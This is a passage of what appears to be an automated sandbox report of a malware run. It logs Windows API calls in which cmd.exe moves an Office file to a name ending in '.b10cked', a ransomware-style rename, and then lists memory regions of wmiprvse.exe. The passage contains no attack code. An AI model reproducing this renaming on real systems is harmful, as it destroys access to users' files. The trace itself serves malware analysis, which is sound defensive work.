[0174.260] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0174.260] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0174.261] GetConsoleTitleW (in: lpConsoleTitle=0x3c0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.261] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0174.261] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0174.261] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0174.261] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0174.262] _wcsicmp (_String1="move", _String2=")") returned 68 [0174.262] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0174.262] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0174.262] _wcsicmp (_String1="IF", _String2="move") returned -4 [0174.262] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0174.262] _wcsicmp (_String1="REM", _String2="move") returned 5 [0174.262] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0174.265] GetConsoleTitleW (in: lpConsoleTitle=0x26f5c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.266] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0174.266] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0174.266] _wcsicmp (_String1="move", _String2="DEL") returned 
9 [0174.266] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0174.266] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0174.266] _wcsicmp (_String1="move", _String2="CD") returned 10 [0174.266] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0174.266] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0174.266] _wcsicmp (_String1="move", _String2="REN") returned -5 [0174.266] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0174.266] _wcsicmp (_String1="move", _String2="SET") returned -6 [0174.266] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0174.266] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0174.266] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0174.266] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0174.266] _wcsicmp (_String1="move", _String2="MD") returned 11 [0174.266] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0174.266] _wcsicmp (_String1="move", _String2="RD") returned -5 [0174.266] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0174.266] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0174.266] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0174.266] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0174.266] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0174.266] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0174.266] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0174.266] _wcsicmp (_String1="move", _String2="VER") returned -9 [0174.266] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0174.266] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0174.266] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0174.266] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0174.266] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0174.266] _wcsicmp (_String1="move", _String2="START") returned -6 [0174.266] _wcsicmp (_String1="move", 
_String2="DPATH") returned 9 [0174.266] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0174.266] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0174.268] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0174.268] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0174.268] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f384, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f37c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f37c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0174.269] _wcsnicmp (_String1="COPYCMD", 
_String2="PATHEXT", _MaxCount=0x7) returned -13 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0174.269] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0174.270] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0174.270] _wcsicmp (_String1="WWINTL~1.TRX", _String2=".") returned 73 [0174.270] _wcsicmp (_String1="WWINTL~1.TRX", _String2="..") returned 73 [0174.270] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\wwintl~1.trx")) 
returned 0x2020 [0174.270] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3d1f18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0174.270] SetErrorMode (uMode=0x0) returned 0x0 [0174.270] SetErrorMode (uMode=0x1) returned 0x0 [0174.270] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x26ed0c, lpFilePart=0x26ecf4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX", lpFilePart=0x26ecf4*="WWINTL~1.TRX") returned 0x3c [0174.270] SetErrorMode (uMode=0x0) returned 0x1 [0174.270] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0174.270] _wcsicmp (_String1="WWINTL~1.TRX", _String2=".") returned 73 [0174.270] _wcsicmp (_String1="WWINTL~1.TRX", _String2="..") returned 73 [0174.270] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\wwintl~1.trx")) returned 0x2020 [0174.271] SetErrorMode (uMode=0x0) returned 0x0 [0174.271] SetErrorMode (uMode=0x1) returned 0x0 [0174.271] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x26f188, lpFilePart=0x26ef20 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX", lpFilePart=0x26ef20*="WWINTL~1.TRX") returned 0x3c [0174.271] SetErrorMode (uMode=0x0) returned 0x1 [0174.271] SetErrorMode (uMode=0x0) returned 0x0 [0174.271] SetErrorMode (uMode=0x1) returned 0x0 [0174.271] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x26f390, lpFilePart=0x26ef20 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll.b10cked", lpFilePart=0x26ef20*="WWINTL.DLL.trx_dll.b10cked") returned 0x4a [0174.271] SetErrorMode (uMode=0x0) returned 0x1 [0174.271] SetLastError (dwErrCode=0x0) [0174.271] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\wwintl.dll.trx_dll.b10cked")) returned 0xffffffff [0174.271] GetLastError () returned 0x2 [0174.271] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x26e89c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e89c) returned 0x3d2128 [0174.271] FindNextFileW (in: hFindFile=0x3d2128, lpFindFileData=0x26e89c | out: lpFindFileData=0x26e89c) returned 0 [0174.272] GetLastError () returned 0x12 [0174.272] FindClose (in: hFindFile=0x3d2128 | out: hFindFile=0x3d2128) returned 1 [0174.274] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x3d1cb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3d1cb8) returned 0x3d2128 [0174.274] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x26eb34, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4a [0174.274] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x26eb34, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x42 [0174.274] GetFileAttributesW 
(lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\wwintl.dll.trx_dll")) returned 0x2020 [0174.274] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\wwintl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\wwintl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0174.275] FindClose (in: hFindFile=0x3d2128 | out: hFindFile=0x3d2128) returned 1 [0174.275] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26eae8 | out: _Buffer=" 1") returned 9 [0174.275] _get_osfhandle (_FileHandle=1) returned 0x7 [0174.275] GetFileType (hFile=0x7) returned 0x2 [0174.281] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0174.281] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26ea74 | out: lpMode=0x26ea74) returned 1 [0174.281] _get_osfhandle (_FileHandle=1) returned 0x7 [0174.281] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26eaa8 | out: lpConsoleScreenBufferInfo=0x26eaa8) returned 1 [0174.281] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0174.281] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26eae8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0174.282] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26eacc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26eacc*=0x1a) returned 1 [0174.282] _get_osfhandle (_FileHandle=1) 
returned 0x7 [0174.282] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0174.282] _get_osfhandle (_FileHandle=1) returned 0x7 [0174.282] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0174.282] _get_osfhandle (_FileHandle=0) returned 0x3 [0174.282] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0174.282] SetConsoleInputExeNameW () returned 0x1 [0174.282] GetConsoleOutputCP () returned 0x1b5 [0174.282] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0174.282] SetThreadUILanguage (LangId=0x0) returned 0x409 [0174.282] exit (_Code=0) Process: id = "308" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x7ea16b60" os_pid = "0xd0c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "298" os_parent_pid = "0x358" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0006a015" [0xc000000f] Region: id = 24310 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24311 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24312 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24313 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename 
= "" Region: id = 24314 start_va = 0xf50000 end_va = 0xf90fff entry_point = 0xf50000 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 24315 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24316 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24317 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24318 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 24319 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24320 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24321 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24322 start_va = 0x120000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 24323 start_va = 0x290000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 24324 start_va = 0x6ebf0000 end_va = 0x6ec07fff entry_point = 0x6ebf0000 region_type = mapped_file name = "ntdsapi.dll" filename = 
"\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 24325 start_va = 0x6ec10000 end_va = 0x6eca5fff entry_point = 0x6ec10000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 24326 start_va = 0x6f7c0000 end_va = 0x6f81bfff entry_point = 0x6f7c0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 24327 start_va = 0x73d70000 end_va = 0x73d7efff entry_point = 0x73d70000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 24328 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24329 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 24330 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 24331 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24332 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 24333 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 
0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24334 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 24335 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24336 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24337 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 24338 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24339 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 24340 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 24341 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 
24342 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24343 start_va = 0x2a0000 end_va = 0x367fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24344 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24345 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24346 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 24347 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 24348 start_va = 0x110000 end_va = 0x116fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 24349 start_va = 0x220000 end_va = 0x221fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 24350 start_va = 0x250000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 24351 start_va = 0x370000 end_va = 0x470fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 24352 start_va = 0x480000 end_va = 0x4fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 24353 start_va = 0x500000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 24354 start_va = 0x590000 
end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 24355 start_va = 0x5d0000 end_va = 0x89efff entry_point = 0x5d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 24356 start_va = 0x8a0000 end_va = 0xc92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 24357 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 24358 start_va = 0x73c00000 end_va = 0x73c20fff entry_point = 0x73c00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 24359 start_va = 0x75730000 end_va = 0x75774fff entry_point = 0x75730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 24360 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 24361 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 24362 start_va = 0xca0000 end_va = 0xd9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 24363 start_va = 0xda0000 end_va = 0xddffff entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 24364 start_va = 0xe20000 end_va = 0xe5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 24365 
start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 24366 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 24367 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 24368 start_va = 0x580000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 24369 start_va = 0x6ebe0000 end_va = 0x6ebe9fff entry_point = 0x6ebe0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 24370 start_va = 0xe90000 end_va = 0xecffff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 24371 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 24372 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 24373 start_va = 